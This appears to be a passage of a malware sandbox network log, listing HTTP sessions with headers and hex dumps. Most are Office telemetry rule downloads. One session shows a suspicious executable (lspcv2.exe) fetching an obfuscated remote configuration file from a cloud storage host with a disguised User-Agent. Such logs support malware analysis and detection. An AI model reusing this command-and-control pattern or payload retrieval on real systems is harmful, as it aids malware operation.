                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  68192.168.2.44982913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 468
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                  ETag: "0x8DC582B9C8E04C8"
                                                                                                                  x-ms-request-id: 06b7c879-901e-00a0-36a3-346a6d000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765w8fzdhC1DFW8ep400000002e000000000fzwm
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  69192.168.2.44982813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 404
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                  ETag: "0x8DC582B9E8EE0F3"
                                                                                                                  x-ms-request-id: 41a7f78c-b01e-0097-2b78-354f33000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765bflfthC1DFWuy9n00000002n000000000eeug
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  70192.168.2.44983213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 428
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                  ETag: "0x8DC582BAC4F34CA"
                                                                                                                  x-ms-request-id: ec03aeec-b01e-005c-7ba1-344c66000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765dbczshC1DFW33an00000002e000000000cfav
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  71192.168.2.44983313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 499
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                  ETag: "0x8DC582B98CEC9F6"
                                                                                                                  x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-16547b76f7fnlcwwhC1DFWz6gw0000000ku000000000cn6b
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.44983092.53.116.1384437912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC107OUTGET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1
                                                                                                                  User-Agent: ler1255.txt
                                                                                                                  Host: s3.timeweb.com
                                                                                                                  2024-11-14 14:00:51 UTC867INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 510
                                                                                                                  Connection: close
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Access-Control-Expose-Headers: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma, Etag, X-Timestamp, X-Trans-Id, X-Openstack-Request-Id, Content-Length, Accept-Ranges
                                                                                                                  Age: 5176
                                                                                                                  Etag: "8cc325c4a72b846a690145124f81749a"
                                                                                                                  Last-Modified: Mon, 30 Oct 2023 15:08:01 GMT
                                                                                                                  X-Container-Storage-Policy-Index: 0
                                                                                                                  X-Container-Storage-Policy-Name: Policy-0
                                                                                                                  X-Krakend: Version 1.4.1
                                                                                                                  X-Krakend-Completed: false
                                                                                                                  X-Timestamp: 1698678480.28571
                                                                                                                  X-Trans-Id: f48a3518-8613-4ed9-8850-e7c442a10a47
                                                                                                                  Expires: Thu, 14 Nov 2024 14:01:20 GMT
                                                                                                                  Cache-Control: max-age=30
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Methods: *
                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                  Access-Control-Max-Age: 1728000
                                                                                                                  2024-11-14 14:00:51 UTC510INData Raw: 4d 72 50 31 4b 61 62 31 4c 61 4c 39 4b 71 7a 42 4e 47 71 41 51 37 48 71 53 33 65 6c 42 70 61 71 42 5a 38 71 43 49 75 6e 44 33 34 6b 43 4a 30 6e 42 74 48 62 50 6f 79 44 32 63 58 71 54 37 30 77 42 6f 79 76 44 32 75 6f 44 33 34 6b 43 4a 47 6e 42 5a 34 6d 43 49 7a 71 50 4d 53 6c 33 47 66 65 54 37 48 6d 45 59 79 6c 45 4a 47 6b 43 5a 47 6e 42 5a 34 71 43 49 75 6e 43 33 34 6c 54 36 4c 64 42 6d 71 41 51 37 48 71 53 33 65 6c 42 70 61 71 42 5a 38 71 43 49 75 6e 44 33 34 6b 43 4a 30 6e 42 74 48 62 50 6f 79 44 32 63 58 71 54 37 30 77 42 6f 79 76 44 32 75 6f 44 33 34 6b 43 4a 47 6e 42 5a 34 6d 43 49 7a 71 50 4d 53 6c 33 47 66 65 54 37 48 6d 45 59 79 6c 45 4a 47 6b 43 5a 47 6e 42 5a 34 71 43 49 75 6e 43 33 34 6c 54 36 4c 64 42 6d 71 41 51 37 48 71 53 33 65 6c 42 70 61
                                                                                                                  Data Ascii: MrP1Kab1LaL9KqzBNGqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpaqBZ8qCIunD34kCJ0nBtHbPoyD2cXqT70wBoyvD2uoD34kCJGnBZ4mCIzqPMSl3GfeT7HmEYylEJGkCZGnBZ4qCIunC34lT6LdBmqAQ7HqS3elBpa


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  73192.168.2.44983413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:50 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 415
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B988EBD12"
                                                                                                                  x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-16547b76f7fm7xw6hC1DFW5px40000000kmg00000000dh2h
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:50 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  74192.168.2.44983613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                  ETag: "0x8DC582BB32BB5CB"
                                                                                                                  x-ms-request-id: 2e90e071-a01e-0098-64a3-348556000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-1749fc9bdbdjgplnhC1DFWhrks00000002h0000000005vvx
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  75192.168.2.44983513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:50 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 471
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                  ETag: "0x8DC582BB5815C4C"
                                                                                                                  x-ms-request-id: 29462bed-001e-0066-044a-36561e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140050Z-r178fb8d765skzg4hC1DFW090c00000000y000000000183a
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  76192.168.2.44983813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:51 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 494
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                  ETag: "0x8DC582BB8972972"
                                                                                                                  x-ms-request-id: 2361c5fe-901e-0064-45f6-2ce8a6000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-16547b76f7f22sh5hC1DFWyb4w0000000kqg0000000063uz
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  77192.168.2.44983913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:51 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:51 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 420
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                  ETag: "0x8DC582B9DAE3EC0"
                                                                                                                  x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140051Z-16547b76f7f7rtshhC1DFWrtqn0000000kvg000000001x19
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:51 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  78192.168.2.44984013.107.246.45443
